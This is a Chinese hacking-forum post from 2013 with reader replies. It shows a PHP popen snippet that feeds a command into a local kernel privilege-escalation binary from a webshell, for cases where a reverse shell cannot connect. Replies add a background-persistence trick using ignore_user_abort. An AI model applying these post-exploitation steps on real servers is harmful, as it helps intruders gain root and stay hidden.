PHP 非交互式 执行交互式命令

2013-12-02 23:13:17 55 2373 1
提权转发不出来
只能出此下策
shell可以用except来执行交互命令
python 也有pexcept模块
perl也有except模块
但是默认不安装
咱们还是用牛逼的php吧
我就不解释了 看懂的人自然就懂了
代码
<?php
$sucommand = "/tmp/2.6.18-2011";
$fp = popen($sucommand ,"w");
@fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");
@pclose($fp);
?>

再补一张图

关于作者

评论55次

要评论?请先  登录  或  注册
  • 55楼
    2017-10-28 22:01
    anlfi

    原型: resource popen ( string $command , string $mode )说明: 能够和命令进行交互。之前介绍的方法只能简单地执行命令,却不能与命令交互。有时须向命令输入一些东西,如在增加xi统用户时,要调用su来把当前用户换到root用户,而su命令必须要在命令行上输入root的密码。这种情况下,用之前提到的方法显然是不行的。popen( )函数打开一个进程管道来执行给定的命令,返回一个文件句柄,可以对它读和写。返回值和fopen()函数一样,返回一个文件指针。除非使用的是单一的模式打开(读or写),否则必须使用pclose()函数关闭。该指针可以被fgets(),fgetss(),fwrite()调用。出错时,返回FALSE。<?phperror_reporting(E_ALL); /* Add redirection so we can get stderr. */$handle = popen('/path/to/executable 2>&1', 'r');echo "'$handle'; " . gettype($handle) . "\n";$read = fread($handle, 2096);echo $read;pclose($handle);?>php 一般都开启安全模式 7大执行命令函数禁用 配置的很变态 嗯嗯php 还有一个邪恶的函数ignore_user_abort(true); 允许驻留执行 执行完php文件以后就会后台执行 删掉原文件都也依然可以执行 重启服务端自然就没有了不过可以结合数据库 来重刷嘿嘿

    1

    这个够详细

  • 54楼
    2017-10-28 21:40

    这个表示没有看懂啊

  • 53楼
    2017-10-27 09:46

    懂起了,非常有用,前几天shell死活反弹不出来,用这个搞定了。

  • 52楼
    2017-10-24 10:35

    提权这块好弱,来学学,谢谢楼主

  • 51楼
    2015-9-23 16:52

    吊炸天!!!!

  • 50楼
    2015-9-6 06:18

    过来学xi了解下。

  • 49楼
    2015-9-5 20:01

    思路不错 666

  • 48楼
    2015-9-5 15:01

    好思路,学xi了

  • 47楼
    2015-9-3 22:29

    牛逼,为什么不早出来

  • 46楼
    2015-9-3 15:46

    学xi了 感谢

  • 45楼
    2014-1-6 21:10

    厉害 学xi了

  • 44楼
    2014-1-6 18:16

    ignore_user_abort(true) 够邪恶,还没用过

  • 43楼
    2014-1-6 18:14

    弱弱的问一句 直接访问php文件就可以执行了,看起来是这个意思?

  • 42楼
    2014-1-2 11:41

    学xi了,,,,,

  • 41楼
    2014-1-1 23:45

    这个不错 可以一试谢谢楼主

  • 40楼
    2013-12-31 16:10

    学xi了~~~~~~~~

  • 39楼
    2013-12-16 15:27

    嗯,去试试

  • 38楼
    2013-12-15 18:09

    PHP 有交互式命令么?

  • 37楼
    2013-12-15 15:47
  • 36楼
    2013-12-14 21:02

    尽管我一直没有测试成功。。但是思路还是不错的。